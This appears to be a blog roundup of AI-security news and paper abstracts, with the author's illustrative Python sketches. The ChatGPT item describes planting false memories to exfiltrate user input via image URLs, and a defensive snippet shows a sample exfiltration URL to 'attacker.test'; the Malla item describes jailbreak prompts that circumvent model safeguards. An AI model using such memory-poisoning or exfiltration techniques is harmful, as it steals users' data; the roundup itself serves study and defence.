I’ve been writing about the possibility of AIs automatically discovering code vulnerabilities since at least 2018. This is an ongoing area of research: AIs doing source code scanning, AIs finding zero-days in the wild, and everything in between. The AIs aren’t very good at it yet, but they’re getting better.
… Since July 2024, ZeroPath has been taking a novel approach, combining deep program analysis with adversarial AI agents for validation. Our methodology has uncovered numerous critical vulnerabilities in production systems, including several that traditional Static Application Security Testing (SAST) tools were ill-equipped to find. This post provides a technical deep-dive into our research methodology and a living summary of the bugs found in popular open-source tools. — Read More
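The post keeps the pipeline at a high level, but the pattern it names, static findings triaged by an adversarial agent, is easy to gesture at. The sketch below is a guess at the shape of such a loop, not ZeroPath's code; the finding schema, the prompt, and the llm() stub are all placeholders:

```python
from dataclasses import dataclass

def llm(prompt: str) -> str:
    # Stand-in for a real chat-completion API call; canned reply
    # so the example runs without a key.
    return "REFUTED: input is validated upstream; sink unreachable"

@dataclass
class Finding:
    file: str
    line: int
    rule: str        # e.g. "sql-injection"
    snippet: str

def validate(finding: Finding) -> bool:
    """Ask an adversarial agent to confirm or refute one SAST hit.

    The agent must argue for exploitability (ideally with a concrete
    triggering input); findings it cannot defend are dropped, which
    is one way to cut the false positives classic SAST is known for.
    """
    verdict = llm(
        f"Rule {finding.rule} flagged {finding.file}:{finding.line}:\n"
        f"{finding.snippet}\n"
        "Reply CONFIRMED with a triggering input, or REFUTED with a reason."
    )
    return verdict.startswith("CONFIRMED")

hit = Finding("app/db.py", 42, "sql-injection", 'cur.execute(f"... {uid}")')
print(validate(hit))   # False with the canned stub above
```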
Malla: Demystifying Real-world Large Language Model Integrated Malicious Services
The underground exploitation of large language models (LLMs) for malicious services (i.e., Malla) is on the rise, amplifying the cyber threat landscape and raising questions about the trustworthiness of LLM technologies. However, there has been little effort to understand this new cybercrime in terms of its magnitude, impact, and techniques. In this paper, we conduct the first systematic study of 212 real-world Mallas, uncovering their proliferation in underground marketplaces and exposing their operational modalities. Our study discloses the Malla ecosystem, revealing its significant growth and impact on today’s public LLM services. Across these 212 Mallas, we identified eight backend LLMs, along with 182 prompts that circumvent the protective measures of public LLM APIs. We further demystify the tactics employed by Mallas, including the abuse of uncensored LLMs and the exploitation of public LLM APIs through jailbreak prompts. Our findings enable a better understanding of the real-world exploitation of LLMs by cybercriminals, offering insights into strategies to counteract this cybercrime. — Read More
Hacker plants false memories in ChatGPT to steal user data in perpetuity
When security researcher Johann Rehberger recently reported a vulnerability in ChatGPT that allowed attackers to store false information and malicious instructions in a user’s long-term memory settings, OpenAI summarily closed the inquiry, labeling the flaw a safety issue, not, technically speaking, a security concern.
So Rehberger did what all good researchers do: He created a proof-of-concept exploit that used the vulnerability to exfiltrate all user input in perpetuity. OpenAI engineers took notice and issued a partial fix earlier this month. — Read More
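Rehberger’s public writeups describe the exfiltration channel in this class of attack as a rendered markdown image whose URL carries conversation text back to an attacker’s server. A minimal sketch of the client-side mitigation idea, assuming a hypothetical allowlist (the function name and hosts below are mine), is to refuse to render images from unknown hosts:

```python
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"cdn.example.test"}     # hypothetical allowlist

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Drop markdown images whose host is not allowlisted.

    The attack smuggles chat content out in the query string of an
    attacker-controlled image URL, which the client fetches the
    moment it renders the model's reply.
    """
    def check(m: re.Match) -> str:
        host = urlparse(m.group(1)).hostname or ""
        return m.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
    return MD_IMAGE.sub(check, markdown)

reply = "Done! ![p](https://attacker.test/log?q=the+users+secret)"
print(strip_untrusted_images(reply))   # -> Done! [image removed]
```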
Generative AI Misuse: A Taxonomy of Tactics and Insights from Real-World Data
Generative, multimodal artificial intelligence (GenAI) offers transformative potential across industries, but its misuse poses significant risks. Prior research has shed light on the potential of advanced AI systems to be exploited for malicious purposes. However, we still lack a concrete understanding of how GenAI models are specifically exploited or abused in practice, including the tactics employed to inflict harm. In this paper, we present a taxonomy of GenAI misuse tactics, informed by existing academic literature and a qualitative analysis of approximately 200 observed incidents of misuse reported between January 2023 and March 2024. Through this analysis, we illuminate key and novel patterns in misuse during this time period, including potential motivations and strategies, and how attackers leverage and abuse system capabilities across modalities (e.g., image, text, audio, video) in the wild. — Read More
Polynomial Time Cryptanalytic Extraction of Neural Network Models
Billions of dollars and countless GPU hours are currently spent on training Deep Neural Networks (DNNs) for a variety of tasks. Thus, it is essential to determine the difficulty of extracting all the parameters of such neural networks when given access to their black-box implementations. Many versions of this problem have been studied over the last 30 years, and the best current attack on ReLU-based deep neural networks was presented at Crypto’20 by Carlini, Jagielski, and Mironov. It resembles a differential chosen-plaintext attack on a cryptosystem that has a secret key embedded in its black-box implementation; the attack requires a polynomial number of queries but an exponential amount of time (as a function of the number of neurons).
In this paper, we improve this attack by developing several new techniques that enable us to extract with arbitrarily high precision all the real-valued parameters of a ReLU-based DNN using a polynomial number of queries and a polynomial amount of time. We demonstrate its practical efficiency by applying it to a full-sized neural network for classifying the CIFAR10 dataset, which has 3072 inputs, 8 hidden layers with 256 neurons each, and about 1.2 million neuronal parameters. An attack following the approach by Carlini et al. requires an exhaustive search over 2^256 possibilities. Our attack replaces this with our new techniques, which require only 30 minutes on a 256-core computer. — Read More
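For intuition about what extraction by queries means, here is a deliberately tiny sketch, not the paper’s attack: it recovers the parameters of a single ReLU neuron from black-box queries alone, via finite differences inside the neuron’s active region. The real result extends the idea to every layer of a deep network while also resolving signs and neuron orderings in polynomial time:

```python
import numpy as np

# Toy black box: ONE hidden ReLU neuron with secret parameters.
# The paper attacks full multi-layer DNNs by peeling off one layer
# at a time; a single neuron only illustrates the query idea.
rng = np.random.default_rng(0)
W_SECRET = rng.normal(size=4)
B_SECRET = 0.3

def blackbox(x: np.ndarray) -> float:
    return max(0.0, float(W_SECRET @ x + B_SECRET))

def extract(d: int = 4, eps: float = 1e-4):
    # Find a point safely inside the active region of the ReLU,
    # where the function is locally linear.
    x0 = rng.normal(size=d)
    while blackbox(x0) < 0.5:
        x0 = rng.normal(size=d)
    # Central finite differences recover each weight; one more
    # evaluation backs out the bias.
    w = np.empty(d)
    for i in range(d):
        e = np.zeros(d); e[i] = eps
        w[i] = (blackbox(x0 + e) - blackbox(x0 - e)) / (2 * eps)
    b = blackbox(x0) - w @ x0
    return w, b

w_hat, b_hat = extract()
print(np.allclose(w_hat, W_SECRET, atol=1e-3), abs(b_hat - B_SECRET) < 1e-3)
```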
Teams of LLM Agents can Exploit Zero-Day Vulnerabilities
LLM agents have become increasingly sophisticated, especially in the realm of cybersecurity. Researchers have shown that LLM agents can exploit real-world vulnerabilities when given a description of the vulnerability, and can solve toy capture-the-flag problems. However, these agents still perform poorly on real-world vulnerabilities that are unknown to the agent ahead of time (zero-day vulnerabilities).
In this work, we show that teams of LLM agents can exploit real-world, zero-day vulnerabilities. Used alone, prior agents struggle to explore many different vulnerabilities and to plan over long horizons. To resolve this, we introduce HPTSA, a system of agents with a planning agent that can launch subagents. The planning agent explores the system and determines which subagents to call, resolving the long-range planning problem of trying different vulnerabilities. We construct a benchmark of 15 real-world vulnerabilities and show that our team of agents improves over prior work by up to 4.5x. — Read More
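The paper’s contribution is architectural, so a schematic helps. The stub below shows the planner-launches-specialist-subagents shape; the llm() helper, the prompts, and the roles are my placeholders, not the authors’ HPTSA implementation:

```python
from dataclasses import dataclass

def llm(prompt: str) -> str:
    # Stand-in for a chat-completion call; canned replies let the
    # control flow run without an API key.
    if prompt.startswith("Survey"):
        return "SQL injection\nXSS\nCSRF"
    return f"(stub report for: {prompt[:40]}...)"

@dataclass
class Subagent:
    specialty: str                       # e.g. "SQL injection"

    def attempt(self, target: str) -> str:
        return llm(f"You are a {self.specialty} specialist. "
                   f"Probe {target} and report what you find.")

@dataclass
class Planner:
    # The planner explores first, then launches one specialist
    # subagent per promising vulnerability class.
    def run(self, target: str) -> list[str]:
        plan = llm(f"Survey {target}. List vulnerability classes "
                   "worth trying, one per line.")
        return [Subagent(cls.strip()).attempt(target)
                for cls in plan.splitlines() if cls.strip()]

print(Planner().run("https://staging.example.test"))
```

The point of the split is that exploring the target and deciding what to try next is handled once, by the planner, rather than being re-derived inside every individual exploit attempt.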
Turkish student using AI software to cheat on a university exam arrested
A Turkish student who used AI software, a camera disguised as a button, and a hidden router to cheat on a university exam has been detained.
The student was spotted behaving in a suspicious way during the TYT exam on June 8 and was detained by police, before being formally arrested and sent to jail pending trial. — Read More
Securing Research Infrastructure for Advanced AI
We’re sharing some high-level details on the security architecture of our research supercomputers.
OpenAI operates some of the largest AI training supercomputers, enabling us to deliver models that are industry-leading in both capabilities and safety while advancing the frontiers of AI. Our mission is to ensure that advanced AI benefits everyone, and the foundation of this work is the infrastructure that powers our research.
To achieve this mission safely, we prioritize the security of these systems. Here, we outline our current architecture and operations that support the secure training of frontier models at scale. This includes measures designed to protect sensitive model weights within a secure environment for AI innovation. While these security features will evolve over time, we believe it’s valuable to provide a current snapshot of how we think about the security of our research infrastructure. We hope this insight will assist other AI research labs and security professionals as they approach securing their own systems (and we’re hiring). — Read More
Meta says it removed six influence campaigns including those from Israel and China
Meta says it cracked down on propaganda campaigns on its platforms, including one that used AI to influence political discourse and create the illusion of wider support for certain viewpoints, according to its quarterly threat report published today. Some campaigns pushed political narratives about current events, including campaigns coming from Israel and Iran that posted in support of the Israeli government.
The networks used Facebook and Instagram accounts to try to influence political agendas around the world. The campaigns — some of which also originated in Bangladesh, China, and Croatia — used fake accounts to post in support of political movements, promote fake news outlets, or comment on the posts of legitimate news organizations. — Read More
In a first, OpenAI removes influence operations tied to Russia, China and Israel
Online influence operations based in Russia, China, Iran, and Israel are using artificial intelligence in their efforts to manipulate the public, according to a new report from OpenAI.
Bad actors have used OpenAI’s tools, which include ChatGPT, to generate social media comments in multiple languages, make up names and bios for fake accounts, create cartoons and other images, and debug code.
OpenAI’s report is the first of its kind from the company, which has swiftly become one of the leading players in AI. ChatGPT has gained more than 100 million users since its public launch in November 2022. — Read More